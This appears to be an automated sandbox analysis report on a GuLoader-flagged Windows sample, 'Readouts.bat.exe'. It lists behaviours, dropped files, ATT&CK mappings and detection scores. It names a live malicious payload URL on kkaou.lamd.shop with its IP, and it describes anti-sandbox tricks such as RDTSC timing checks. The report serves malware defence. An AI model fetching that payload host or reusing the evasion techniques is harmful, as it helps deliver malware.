3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-EncodingData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Mon, 25 Nov 2024 06:11:07 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 315Connection: keep-aliveVary: Accept-Encoding
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.bin
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.bin%
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.bin0
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.bin3
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002928000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.bin6
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.bin8
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binB
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binG
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binH
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binL
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binT
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binV
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binY
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binc
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.bing
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.bini
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binm
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binmswsock.dll.mui
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binq
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binr
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.bint
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binwshqos.dll.mui
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binwshqos.dll.mui3
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binwshqos.dll.muiY
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://kkaou.lamd.shop/ts.binz
      Source: Readouts.bat.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
      Source: Readouts.bat.exe, 00000003.00000001.1851018769.0000000000649000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.ftp.ftp://ftp.gopher.
      Source: Readouts.bat.exe, 00000003.00000001.1851018769.00000000005F2000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/frameset.dtd
      Source: Readouts.bat.exe, 00000003.00000001.1851018769.00000000005F2000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: http://www.w3c.org/TR/1999/REC-html401-19991224/loose.dtd
      Source: Readouts.bat.exe, 00000003.00000001.1851018769.0000000000649000.00000008.00000001.01000000.00000009.sdmpString found in binary or memory: https://inference.location.live.net/inferenceservice/v21/Pox/GetLocationUsingFingerprinte1e71f6b-214
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_0040542B GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,LdrInitializeThunk,SendMessageW,CreatePopupMenu,LdrInitializeThunk,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_0040542B
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
      Source: C:\Users\user\Desktop\Readouts.bat.exeFile created: C:\Windows\resources\0809Jump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeFile created: C:\Windows\resources\0809\mysterist.iniJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00404C680_2_00404C68
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_0040698E0_2_0040698E
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_73CB1B630_2_73CB1B63
      Source: Readouts.bat.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
      Source: classification engineClassification label: mal76.troj.evad.winEXE@3/9@1/1
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_004046EC GetDlgItem,SetWindowTextW,LdrInitializeThunk,LdrInitializeThunk,SHBrowseForFolderW,CoTaskMemFree,lstrcmpiW,lstrcatW,SetDlgItemTextW,LdrInitializeThunk,GetDiskFreeSpaceW,MulDiv,SetDlgItemTextW,0_2_004046EC
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00402104 LdrInitializeThunk,CoCreateInstance,LdrInitializeThunk,0_2_00402104
      Source: C:\Users\user\Desktop\Readouts.bat.exeFile created: C:\Users\user~1\AppData\Local\Temp\nsqE7A8.tmpJump to behavior
      Source: Readouts.bat.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\Readouts.bat.exeFile read: C:\Users\desktop.iniJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
      Source: Readouts.bat.exeReversingLabs: Detection: 13%
      Source: Readouts.bat.exeVirustotal: Detection: 20%
      Source: C:\Users\user\Desktop\Readouts.bat.exeFile read: C:\Users\user\Desktop\Readouts.bat.exeJump to behavior
      Source: unknownProcess created: C:\Users\user\Desktop\Readouts.bat.exe "C:\Users\user\Desktop\Readouts.bat.exe"
      Source: C:\Users\user\Desktop\Readouts.bat.exeProcess created: C:\Users\user\Desktop\Readouts.bat.exe "C:\Users\user\Desktop\Readouts.bat.exe"
      Source: C:\Users\user\Desktop\Readouts.bat.exeProcess created: C:\Users\user\Desktop\Readouts.bat.exe "C:\Users\user\Desktop\Readouts.bat.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: uxtheme.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: userenv.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: apphelp.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: propsys.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: dwmapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: cryptbase.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: oleacc.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: version.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: shfolder.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: riched20.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: usp10.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: msls31.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: textinputframework.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: coreuicomponents.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: ntmarta.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: coremessaging.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: wintypes.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: textshaping.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: iertutil.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: sspicli.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: powrprof.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: winhttp.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: wkscli.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: netutils.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: umpdc.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: wininet.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: windows.storage.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: wldp.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: profapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: kernel.appcore.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: mswsock.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: iphlpapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: winnsi.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: urlmon.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: srvcli.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: dnsapi.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: rasadhlp.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeSection loaded: fwpuclnt.dllJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeFile written: C:\Windows\Resources\0809\mysterist.iniJump to behavior
      Source: Readouts.bat.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
      Source: Binary string: mshtml.pdb source: Readouts.bat.exe, 00000003.00000001.1851018769.0000000000649000.00000008.00000001.01000000.00000009.sdmp
      Source: Binary string: mshtml.pdbUGP source: Readouts.bat.exe, 00000003.00000001.1851018769.0000000000649000.00000008.00000001.01000000.00000009.sdmp

      Data Obfuscation

      barindex
      Yara detected GuLoader
      Source: Yara matchFile source: 00000000.00000002.1852688575.0000000005615000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000003.00000002.2593525924.0000000002115000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_73CB1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73CB1B63
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_73CB2FD0 push eax; ret 0_2_73CB2FFE
      Source: C:\Users\user\Desktop\Readouts.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsbEAA6.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\Readouts.bat.exeFile created: C:\Users\user\AppData\Local\Temp\nsbEAA6.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Readouts.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

      Malware Analysis System Evasion

      barindex
      Switches to a custom stack to bypass stack traces
      Source: C:\Users\user\Desktop\Readouts.bat.exeAPI/Special instruction interceptor: Address: 595D26D
      Source: C:\Users\user\Desktop\Readouts.bat.exeAPI/Special instruction interceptor: Address: 245D26D
      Tries to detect virtualization through RDTSC time measurements
      Source: C:\Users\user\Desktop\Readouts.bat.exeRDTSC instruction interceptor: First address: 591B871 second address: 591B871 instructions: 0x00000000 rdtsc 0x00000002 test ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F8ED558308Dh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a jmp 00007F8ED55830EBh 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Readouts.bat.exeRDTSC instruction interceptor: First address: 241B871 second address: 241B871 instructions: 0x00000000 rdtsc 0x00000002 test ch, bh 0x00000004 cmp ebx, ecx 0x00000006 jc 00007F8ED4E29ABDh 0x00000008 inc ebp 0x00000009 inc ebx 0x0000000a jmp 00007F8ED4E29B1Bh 0x0000000c rdtsc
      Source: C:\Users\user\Desktop\Readouts.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbEAA6.tmp\LangDLL.dllJump to dropped file
      Source: C:\Users\user\Desktop\Readouts.bat.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\nsbEAA6.tmp\System.dllJump to dropped file
      Source: C:\Users\user\Desktop\Readouts.bat.exe TID: 7844Thread sleep count: 119 > 30Jump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exe TID: 7844Thread sleep time: -1190000s >= -30000sJump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Readouts.bat.exeLast function: Thread delayed
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_004065C7 FindFirstFileW,FindClose,0_2_004065C7
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00405996 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,0_2_00405996
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00402868 FindFirstFileW,0_2_00402868
      Source: Readouts.bat.exe, 00000003.00000002.2594681674.0000000002928000.00000004.00000020.00020000.00000000.sdmp, Readouts.bat.exe, 00000003.00000002.2594681674.000000000297D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
      Source: C:\Users\user\Desktop\Readouts.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4978
      Source: C:\Users\user\Desktop\Readouts.bat.exeAPI call chain: ExitProcess graph end nodegraph_0-4975
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00401E49 LdrInitializeThunk,ShowWindow,EnableWindow,0_2_00401E49
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_73CB1B63 GlobalAlloc,lstrcpyW,lstrcpyW,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,GlobalFree,lstrcpyW,GetModuleHandleW,LoadLibraryW,GetProcAddress,lstrlenW,0_2_73CB1B63
      Source: C:\Users\user\Desktop\Readouts.bat.exeProcess created: C:\Users\user\Desktop\Readouts.bat.exe "C:\Users\user\Desktop\Readouts.bat.exe"Jump to behavior
      Source: C:\Users\user\Desktop\Readouts.bat.exeCode function: 0_2_00403359 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,LdrInitializeThunk,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_00403359

      Mitre Att&ck Matrix

      ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
      Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
      Native API      		1
      DLL Side-Loading      		1
      Access Token Manipulation      		1
      Masquerading      		OS Credential Dumping21
      Security Software Discovery      		Remote Services1
      Archive Collected Data      		1
      Encrypted Channel      		Exfiltration Over Other Network Medium1
      System Shutdown/Reboot
      CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts11
      Process Injection      		1
      Virtualization/Sandbox Evasion      		LSASS Memory1
      Virtualization/Sandbox Evasion      		Remote Desktop Protocol1
      Clipboard Data      		3
      Ingress Tool Transfer      		Exfiltration Over BluetoothNetwork Denial of Service
      Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
      DLL Side-Loading      		1
      Access Token Manipulation      		Security Account Manager3
      File and Directory Discovery      		SMB/Windows Admin SharesData from Network Shared Drive3
      Non-Application Layer Protocol      		Automated ExfiltrationData Encrypted for Impact
      Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook11
      Process Injection      		NTDS23
      System Information Discovery      		Distributed Component Object ModelInput Capture13
      Application Layer Protocol      		Traffic DuplicationData Destruction
      Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
      Obfuscated Files or Information      		LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
      Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
      DLL Side-Loading      		Cached Domain CredentialsWi-Fi DiscoveryVNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.


      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      Readouts.bat.exe13%ReversingLabs
      Readouts.bat.exe21%VirustotalBrowse

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Users\user\AppData\Local\Temp\nsbEAA6.tmp\LangDLL.dll0%ReversingLabs
      C:\Users\user\AppData\Local\Temp\nsbEAA6.tmp\System.dll3%ReversingLabs

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://kkaou.lamd.shop/ts.binT100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binL100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.bin100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binV100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binH100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binY100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binwshqos.dll.mui3100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.bin4%VirustotalBrowse
      http://kkaou.lamd.shop/ts.bing100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binc100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.bin%100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binwshqos.dll.mui100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binm100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.bini100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.bin6100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.bin3100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binr100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binq100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.bin0100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binwshqos.dll.muiY100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binz100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.bin8100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binmswsock.dll.mui100%Avira URL Cloudmalware
      http://kkaou.lamd.shop/ts.binB100%Avira URL Cloudmalware

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      kkaou.lamd.shop
      		172.93.121.126
      		truefalse
        		unknown
        s-part-0035.t-0009.t-msedge.net
        		13.107.246.63
        		truefalse
          		high

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://kkaou.lamd.shop/ts.binfalse
          • 4%, Virustotal, Browse
          • Avira URL Cloud: malware
          		unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://kkaou.lamd.shop/ts.binLReadouts.bat.exe, 00000003.00000002.2594681674.0000000002968000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://kkaou.lamd.shop/ts.binHReadouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://kkaou.lamd.shop/ts.binVReadouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://kkaou.lamd.shop/ts.binTReadouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: malware
          		unknown
          http://www.ftp.ftp://ftp.gopher.Readouts.bat.exe, 00000003.00000001.1851018769.0000000000649000.00000008.00000001.01000000.00000009.sdmpfalse
            		high
            http://kkaou.lamd.shop/ts.binYReadouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://kkaou.lamd.shop/ts.binwshqos.dll.mui3Readouts.bat.exe, 00000003.00000002.2594681674.0000000002963000.00000004.00000020.00020000.00000000.sdmpfalse
            • Avira URL Cloud: malware
            		unknown
            http://nsis.sf.net/NSIS_ErrorErrorReadouts.bat.exefalse
              		high
              http://kkaou.lamd.shop/ts.bingReadouts.bat.exe, 00000003.00000002.2594681674.0000000002979000.00000004.00000020.00020000.00000000.sdmpfalse
              • Avira URL Cloud: malware
              		unknown
